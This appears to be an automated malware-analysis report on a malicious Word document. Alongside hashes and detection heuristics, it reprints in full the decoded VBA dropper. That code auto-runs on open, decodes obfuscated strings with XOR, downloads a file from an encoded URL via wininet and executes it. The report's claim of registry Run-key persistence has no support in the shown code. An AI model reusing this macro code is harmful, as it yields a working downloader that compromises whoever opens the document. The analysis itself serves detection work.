Office (OLE) malware analysis — malicious · 84ed4af68f401bdf

MALICIOUS

Office (OLE)

73.5 KB Created: 2015-01-19 17:07:00 Authoring application: Microsoft Office Word First seen: 2015-04-05

MD5: fc2cf7ec3e6e3b96612c20ec12c3794b SHA-1: d30687f407ad21fd6ef7638319a2ed5e9992c798 SHA-256: 84ed4af68f401bdf7f5470fbb4a49134a523a032919baf8610510d5e34b03268

250 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The file contains obfuscated VBA macros, including an auto-executing 'autoopen' subroutine. The script utilizes CreateObject to interact with the file system and likely downloads a second-stage payload. The presence of CreateObject and the obfuscated loader strongly suggest a dropper functionality. The script attempts to create a persistence mechanism via a registry Run key.

Heuristics 8

ClamAV: Doc.Dropper.Agent-1567308 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-1567308
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
Set FSOOO2 = CreateObject(KimberDon11(vjf788eS, Mcdsef42))
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set FSOOO2 = CreateObject(KimberDon11(vjf788eS, Mcdsef42))
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub autoopen()
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6828 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6828 bytes
SHA-256: `91dba2aa90ddd04ecb5f0475f447f298117a52b653bf3e9893667562c1ad2b07`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() ascascascasc End Sub Attribute VB_Name = "Class1" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Module11" Private Const GRxvSG = "321C171E1E49374545594A3C405F1D0E1A" Private Const jryj = "3D15191E010E185406070D3A594E" Private Const sdioph34 = "090006024848595B5C465026534E5A0216135C020B595F461A41364F05111911" Private Const Mcdsef42 = "3217001B02131F5B521B65364D4E27180706171F28145F505657" Private Const vjf788eS = "tatrrrgv555#_!+" Sub ascascascasc() Dim FSOOO2 Dim sder53dfbhRF As Integer For sder53dfbhRF = 0 To 0 If sder53dfbhRF = 5 Then End Next sder53dfbhRF Set FSOOO2 = CreateObject(KimberDon11(vjf788eS, Mcdsef42)) Dim fffffF Const fffffFID = 2 Dim DdDd22A As Integer For DdDd22A = 0 To 0 If DdDd22A = 5 Then End Next DdDd22A Set fffffF = FSOOO2.GetSpecialFolder(fffffFID) Dim Ee11 As Integer For Ee11 = 0 To 0 If Ee11 = 5 Then End Next Ee11 EdEdE111 = fffffF & KimberDon11(vjf788eS, jryj) Dim sil3489df As Integer For sil3489df = 0 To 0 If sil3489df = 5 Then End Next sil3489df Set FSObject2 = CreateObject(KimberDon11(vjf788eS, Mcdsef42)) Dim seswwwsa As Integer For seswwwsa = 0 To 0 If seswwwsa = 5 Then End Next seswwwsa If FSObject2.FileExists(EdEdE111) Then FSObject2.DeleteFile EdEdE111 End If If samama4fr(KimberDon11(vjf788eS, sdioph34), EdEdE111) Then End If Set SSSS = Nothing If FSObject2.FileExists(EdEdE111) Then End If Set SASASA = CreateObject(KimberDon11(vjf788eS, GRxvSG)) SASASA.Open EdEdE111 End Sub Attribute VB_Name = "Module3" Option Explicit #If VBA7 And Win64 Then Private Declare PtrSafe Function figal1221 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long Private Declare PtrSafe Function lastSm23 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr Private Declare PtrSafe Function feefeROZ Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As LongPtr, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer Private Declare PtrSafe Function hlopa3r3 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr #Else Private Declare Function figal1221 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long Private Declare Function lastSm23 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long Private Declare Function feefeROZ Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As Long, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer Private Declare Function hlopa3r3 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long #End If Private Const MBL = 8162 Private Const AAN As String = "Zadral1" Private Const IOTD = 1 Private Const IFNCW = &H4000000 Public Function samama4fr(ByVal sURL As String, ByVal sFileName As String) As Boolean #If VBA7 And Win64 Then Dim hOpen As LongPtr, hFile As LongPtr #Else Dim hOpen As Long, hFile As Long #End If Dim Ret As Long Dim sBuff As String * MBL, sData As String Dim iFile As Integer, dData As Double hOpen = lastSm23(AAN, IOTD, vbNullString, vbNullString, 0) If hOpen = 0 Then Exit Function End If hFile = hlopa3r3(hOpen, sURL, vbNullString, 0, IFNCW, 0) If hFile = 0 Then dData = 0 Else feefeROZ hFile, sBuff, MBL, Ret sData = sBuff Do While Ret <> 0 feefeROZ hFile, sBuff, MBL, Ret sData = sData + Mid(sBuff, 1, Ret) Loop dData = Len(sData): iFile = FreeFile Open sFileName For Binary Access Write Lock Write As #iFile Put #iFile, , sData: Close #iFile End If figal1221 hFile figal1221 hOpen sData = "" If dData Then samama4fr = True End If End Function Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{E73646E4-BCBD-44BE-AAC0-4D1051C3BDDC}{6760D4C4-1FDC-48A3-8BF2-241C237E98B9}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Module1" Private Sub RIVgO() GoTo wefwefwefwefewf wefwefwefwefewf: GoTo REREGsssssgvfrgrg REREGsssssgvfrgrg: GoTo ENNEIKISKKKK7 ENNEIKISKKKK7: GoTo ENNEIKISKKKK71 ENNEIKISKKKK71: GoTo ENNEIKISKKKK72 ENNEIKISKKKK72: GoTo ULLLLLAKhhwshefg ULLLLLAKhhwshefg: End Sub Public Function KimberDon11(asasas1oO1 As String, asasas1oO As String) As String Dim asasas1 As Long Dim asasas1O As String Dim asasas10 As Integer Dim Zhhhzhhz As Integer For Zhhhzhhz = 0 To 0 If Zhhhzhhz = 5 Then End Next Zhhhzhhz Dim asasas101 As Integer Dim sdsssss As Integer For sdsssss = 0 To 0 If sdsssss = 8 Then End Next sdsssss For asasas1 = 1 To (Len(asasas1oO) / 2) asasas10 = Val("&H" & (Mid$(asasas1oO, (2 * asasas1) - 1, 2))) asasas101 = Asc(Mid$(asasas1oO1, ((asasas1 Mod Len(asasas1oO1)) + 1), 1)) Dim Happlik As Integer For Happlik = 0 To 0 If Happlik = 4 Then End Next Happlik asasas1O = asasas1O + Chr(asasas10 Xor asasas101) Next asasas1 KimberDon11 = asasas1O End Function Private Sub IHYbeVuJC() GoTo ULLLLLAKhhwshefg1 ULLLLLAKhhwshefg1: GoTo ULLLLLAKhhwshefg2 ULLLLLAKhhwshefg2: GoTo osumLbSDlnHkpCzivUUw osumLbSDlnHkpCzivUUw: GoTo tNsQiIjuoGpSqlOQxDQfTz tNsQiIjuoGpSqlOQxDQfTz: GoTo uykoEux uykoEux: GoTo rVTBqKArFPEEEEEyylmMVi rVTBqKArFPEEEEEyylmMVi: GoTo IhzKeee22zw IhzKeee22zw: GoTo IhzKeee22333zw IhzKeee22333zw: GoTo IhzKeee22333444zw IhzKeee22333444zw: End Sub

SHA-256: 91dba2aa90ddd04ecb5f0475f447f298117a52b653bf3e9893667562c1ad2b07

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
ascascascasc
End Sub

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module11"
Private Const GRxvSG = "321C171E1E49374545594A3C405F1D0E1A"
Private Const jryj = "3D15191E010E185406070D3A594E"
Private Const sdioph34 = "090006024848595B5C465026534E5A0216135C020B595F461A41364F05111911"
Private Const Mcdsef42 = "3217001B02131F5B521B65364D4E27180706171F28145F505657"
Private Const vjf788eS = "tatrrrgv555#_!+"






Sub ascascascasc()
Dim FSOOO2
Dim sder53dfbhRF As Integer
For sder53dfbhRF = 0 To 0
If sder53dfbhRF = 5 Then End
Next sder53dfbhRF
Set FSOOO2 = CreateObject(KimberDon11(vjf788eS, Mcdsef42))
Dim fffffF
Const fffffFID = 2
Dim DdDd22A As Integer
For DdDd22A = 0 To 0
If DdDd22A = 5 Then End
Next DdDd22A
Set fffffF = FSOOO2.GetSpecialFolder(fffffFID)
Dim Ee11 As Integer
For Ee11 = 0 To 0
If Ee11 = 5 Then End
Next Ee11
EdEdE111 = fffffF & KimberDon11(vjf788eS, jryj)
Dim sil3489df As Integer
For sil3489df = 0 To 0
If sil3489df = 5 Then End
Next sil3489df
Set FSObject2 = CreateObject(KimberDon11(vjf788eS, Mcdsef42))
Dim seswwwsa As Integer
For seswwwsa = 0 To 0
If seswwwsa = 5 Then End
Next seswwwsa
If FSObject2.FileExists(EdEdE111) Then
FSObject2.DeleteFile EdEdE111
End If
If samama4fr(KimberDon11(vjf788eS, sdioph34), EdEdE111) Then
End If
Set SSSS = Nothing
If FSObject2.FileExists(EdEdE111) Then
End If
Set SASASA = CreateObject(KimberDon11(vjf788eS, GRxvSG))
SASASA.Open EdEdE111
End Sub






Attribute VB_Name = "Module3"
Option Explicit

#If VBA7 And Win64 Then
Private Declare PtrSafe Function figal1221 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
Private Declare PtrSafe Function lastSm23 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
Private Declare PtrSafe Function feefeROZ Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As LongPtr, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Private Declare PtrSafe Function hlopa3r3 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
Private Declare Function figal1221 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Private Declare Function lastSm23 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Private Declare Function feefeROZ Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As Long, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Private Declare Function hlopa3r3 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If

Private Const MBL = 8162
Private Const AAN As String = "Zadral1"
Private Const IOTD = 1
Private Const IFNCW = &H4000000
Public Function samama4fr(ByVal sURL As String, ByVal sFileName As String) As Boolean
    #If VBA7 And Win64 Then
        Dim hOpen As LongPtr, hFile As LongPtr
    #Else
        Dim hOpen As Long, hFile As Long
    #End If
    Dim Ret As Long
    Dim sBuff As String * MBL, sData As String
    Dim iFile As Integer, dData As Double
    hOpen = lastSm23(AAN, IOTD, vbNullString, vbNullString, 0)
    If hOpen = 0 Then
        Exit Function
    End If
    hFile = hlopa3r3(hOpen, sURL, vbNullString, 0, IFNCW, 0)
    If hFile = 0 Then
        dData = 0
    Else
        feefeROZ hFile, sBuff, MBL, Ret
        sData = sBuff
        Do While Ret <> 0
            feefeROZ hFile, sBuff, MBL, Ret
            sData = sData + Mid(sBuff, 1, Ret)
        Loop
        dData = Len(sData): iFile = FreeFile
        Open sFileName For Binary Access Write Lock Write As #iFile
        Put #iFile, , sData: Close #iFile
    End If
    figal1221 hFile
    figal1221 hOpen
    sData = ""
    If dData Then
        samama4fr = True
    End If
End Function

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E73646E4-BCBD-44BE-AAC0-4D1051C3BDDC}{6760D4C4-1FDC-48A3-8BF2-241C237E98B9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"
Private Sub RIVgO()
GoTo wefwefwefwefewf
wefwefwefwefewf:
GoTo REREGsssssgvfrgrg
REREGsssssgvfrgrg:
GoTo ENNEIKISKKKK7
ENNEIKISKKKK7:
GoTo ENNEIKISKKKK71
ENNEIKISKKKK71:
GoTo ENNEIKISKKKK72
ENNEIKISKKKK72:
GoTo ULLLLLAKhhwshefg
ULLLLLAKhhwshefg:

End Sub
Public Function KimberDon11(asasas1oO1 As String, asasas1oO As String) As String
    Dim asasas1 As Long
    Dim asasas1O As String
    Dim asasas10 As Integer
    
    Dim Zhhhzhhz As Integer
For Zhhhzhhz = 0 To 0
If Zhhhzhhz = 5 Then End
Next Zhhhzhhz
    
    Dim asasas101 As Integer
    Dim sdsssss As Integer
For sdsssss = 0 To 0
If sdsssss = 8 Then End
Next sdsssss
    For asasas1 = 1 To (Len(asasas1oO) / 2)
        asasas10 = Val("&H" & (Mid$(asasas1oO, (2 * asasas1) - 1, 2)))
        asasas101 = Asc(Mid$(asasas1oO1, ((asasas1 Mod Len(asasas1oO1)) + 1), 1))
        Dim Happlik As Integer
        For Happlik = 0 To 0
        If Happlik = 4 Then End
        Next Happlik
        asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
    Next asasas1
   KimberDon11 = asasas1O
End Function

Private Sub IHYbeVuJC()
GoTo ULLLLLAKhhwshefg1
ULLLLLAKhhwshefg1:
GoTo ULLLLLAKhhwshefg2
ULLLLLAKhhwshefg2:
GoTo osumLbSDlnHkpCzivUUw
osumLbSDlnHkpCzivUUw:
GoTo tNsQiIjuoGpSqlOQxDQfTz
tNsQiIjuoGpSqlOQxDQfTz:
GoTo uykoEux
uykoEux:
GoTo rVTBqKArFPEEEEEyylmMVi
rVTBqKArFPEEEEEyylmMVi:
GoTo IhzKeee22zw
IhzKeee22zw:
GoTo IhzKeee22333zw
IhzKeee22333zw:
GoTo IhzKeee22333444zw
IhzKeee22333444zw:

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.